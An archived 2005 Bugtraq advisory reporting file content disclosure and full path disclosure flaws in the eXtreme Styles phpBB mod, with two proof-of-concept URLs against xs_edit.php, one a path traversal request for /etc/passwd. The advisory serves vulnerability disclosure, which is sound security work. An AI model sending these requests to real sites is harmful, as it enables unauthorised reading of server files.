[41497] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

eXtreme Styles mod <= 2.2.1 Multiple Vulnerabilities

daemon@ATHENA.MIT.EDU (tommie1@adelphia.net)
Sat Dec 3 18:39:34 2005

Date: 3 Dec 2005 13:29:02 -0000
Message-ID: <20051203132902.30066.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: tommie1@adelphia.net
To: bugtraq@securityfocus.com

eXtreme Styles mod <= 2.2.1 Multiple Vulnerabilities
====================================================
http://www.phpbbstyles.com/

Description
===========
These vulnerabilities could allow an attacker that has gained
administrative access view file content on the system.

1. Remote File Content Disclosure
=======================
In xs_edit.php, the "edit" request field is not properly sanitized.

2. Full Path Disclosure
=======================
In xs_edit.php, the "viewbackup" request field is not properly sanitized.

Proof of Concept
================
1. http://forum/admin/xs_edit.php?edit=../../../../etc/passwd
2. http://forum/admin/xs_edit.php?edit=&viewbackup=1

--------------
http://wtf.bz/


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[41497] in bugtraq

eXtreme Styles mod <= 2.2.1 Multiple Vulnerabilities

daemon@ATHENA.MIT.EDU (tommie1@adelphia.net)Sat Dec 3 18:39:34 2005

daemon@ATHENA.MIT.EDU (tommie1@adelphia.net)
Sat Dec 3 18:39:34 2005